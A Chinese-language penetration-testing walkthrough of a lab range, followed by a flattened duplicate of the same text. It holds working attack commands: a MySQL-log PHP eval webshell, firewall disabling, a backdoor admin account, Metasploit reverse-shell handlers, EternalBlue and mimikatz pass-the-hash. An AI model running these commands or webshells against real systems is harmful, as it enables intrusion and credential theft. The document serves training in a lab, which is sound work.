红日靶场(一)渗透测试实战教学文档

一、靶场环境配置

1.1 网络拓扑结构

攻击机：Kali Linux (192.168.108.128)
目标机1：Win7 (Web服务器，双网卡)
- 外网网卡：192.168.108.132 (VMnet8)
- 内网网卡：192.168.52.143 (VMnet1)
目标机2：Windows 2008 (域控，192.168.52.138)
目标机3：Win2k3 (域管，192.168.52.141)

1.2 网络配置要点

确保Kali与Win7外网网卡在同一网段(VMnet8)
Win7内网网卡与域内其他主机在同一网段(VMnet1)
根据实际Kali网段调整Win7外网网卡IP

二、Web渗透阶段

2.1 信息收集

端口扫描：
```
nmap -sS -T4 192.168.108.132
```
发现开放端口：3306(MySQL), 135, 139, 445(SMB)
目录扫描：
- 使用工具：dirsearch、御剑、dirb
- 发现关键目录：
  - /phpmyadmin
  - 备份文件
  - /yxcms (部分工具可能扫不到)

2.2 通过phpMyAdmin获取WebShell

方法一：INTO OUTFILE导出木马

必要条件：

知道网站绝对路径
secure_file_priv参数为空(默认为NULL)
具有root权限

方法二：MySQL日志文件Getshell（实战成功方法）

登录phpMyAdmin(admin/admin)
检查日志状态：
```
SHOW VARIABLES LIKE '%general%';
```

开启日志并设置路径：

SET GLOBAL general_log='on';
SET GLOBAL general_log_file='C:/phpStudy/www/hack.php';

写入WebShell：
```
SELECT '<?php eval($_POST["cmd"]);?>';
```
使用哥斯拉连接WebShell：
- URL: http://192.168.108.132/hack.php
- 密码: cmd

三、内网渗透阶段

3.1 权限维持与横向移动准备

关闭防火墙：

netsh advfirewall set allprofiles state off

上线Cobalt Strike：
- 启动CS服务端
- 生成Windows可执行payload
- 通过哥斯拉上传并执行payload
- CS上线后优化：
```
sleep 0
shell systeminfo
```
提权操作：
- 查看补丁情况(发现仅4个补丁)
- 使用svc-exe提权至SYSTEM权限

3.2 内网信息收集

域环境探测：
```
net config Workstation
net view /domain
```
- 当前域：god
- 域控主机：owa (192.168.52.138)

域内主机发现：

net group "domain controllers" /domain
net view

发现主机：192.168.52.141

开启RDP远程连接(可选)：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
netsh advfirewall set allprofiles state off
net user test Passwd123 /add
net localgroup administrators test /add

四、后渗透阶段

4.1 CS与MSF联动

MSF设置监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.236.128
set lport 1111
exploit

CS派生会话：
- 创建新监听器：
  - Payload类型：foreign/reverse_http
  - 名称：MSF
  - 端口与MSF监听端口一致
- 执行：
```
spawn MSF
```

4.2 横向移动技术

永恒之蓝利用(失败)：

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

哈希传递攻击(PTH)成功：
- 使用CS的mimikatz抓取哈希与明文密码
- 通过psexec横向移动：
  - 自动填充获取的凭据
  - 选择SMB监听器
  - 使用Web服务器会话作为跳板
- 最终成功获取域控权限

五、关键知识点总结

Web渗透突破口：
- 弱口令攻击(phpMyAdmin)
- MySQL日志文件Getshell技术
内网渗透核心：
- 权限维持(Cobalt Strike)
- 信息收集(net命令系列)
- 横向移动(PTH哈希传递)
防御建议：
- MySQL安全配置(secure_file_priv)
- 定期更改管理密码
- 及时安装系统补丁
- 限制SMB协议的使用
- 监控异常日志文件修改

本教学文档完整还原了从外网渗透到内网横向移动的全过程，重点突出了在实际渗透测试中的关键技术点和操作流程。

红日靶场(一)渗透测试实战教学文档一、靶场环境配置 1.1 网络拓扑结构攻击机：Kali Linux (192.168.108.128) 目标机1 ：Win7 (Web服务器，双网卡) 外网网卡：192.168.108.132 (VMnet8) 内网网卡：192.168.52.143 (VMnet1) 目标机2 ：Windows 2008 (域控，192.168.52.138) 目标机3 ：Win2k3 (域管，192.168.52.141) 1.2 网络配置要点确保Kali与Win7外网网卡在同一网段(VMnet8) Win7内网网卡与域内其他主机在同一网段(VMnet1) 根据实际Kali网段调整Win7外网网卡IP 二、Web渗透阶段 2.1 信息收集端口扫描：发现开放端口：3306(MySQL), 135, 139, 445(SMB) 目录扫描：使用工具：dirsearch、御剑、dirb 发现关键目录： /phpmyadmin 备份文件 /yxcms (部分工具可能扫不到) 2.2 通过phpMyAdmin获取WebShell 方法一：INTO OUTFILE导出木马必要条件：知道网站绝对路径 secure_ file_ priv参数为空(默认为NULL) 具有root权限方法二：MySQL日志文件Getshell（实战成功方法）登录phpMyAdmin(admin/admin) 检查日志状态：开启日志并设置路径：写入WebShell：使用哥斯拉连接WebShell： URL: http://192.168.108.132/hack.php 密码: cmd 三、内网渗透阶段 3.1 权限维持与横向移动准备关闭防火墙：上线Cobalt Strike ：启动CS服务端生成Windows可执行payload 通过哥斯拉上传并执行payload CS上线后优化：提权操作：查看补丁情况(发现仅4个补丁) 使用svc-exe提权至SYSTEM权限 3.2 内网信息收集域环境探测：当前域：god 域控主机：owa (192.168.52.138) 域内主机发现：发现主机：192.168.52.141 开启RDP远程连接(可选) ：四、后渗透阶段 4.1 CS与MSF联动 MSF设置监听： CS派生会话：创建新监听器： Payload类型：foreign/reverse_ http 名称：MSF 端口与MSF监听端口一致执行： 4.2 横向移动技术永恒之蓝利用(失败) ：哈希传递攻击(PTH)成功：使用CS的mimikatz抓取哈希与明文密码通过psexec横向移动：自动填充获取的凭据选择SMB监听器使用Web服务器会话作为跳板最终成功获取域控权限五、关键知识点总结 Web渗透突破口：弱口令攻击(phpMyAdmin) MySQL日志文件Getshell技术内网渗透核心：权限维持(Cobalt Strike) 信息收集(net命令系列) 横向移动(PTH哈希传递) 防御建议： MySQL安全配置(secure_ file_ priv) 定期更改管理密码及时安装系统补丁限制SMB协议的使用监控异常日志文件修改本教学文档完整还原了从外网渗透到内网横向移动的全过程，重点突出了在实际渗透测试中的关键技术点和操作流程。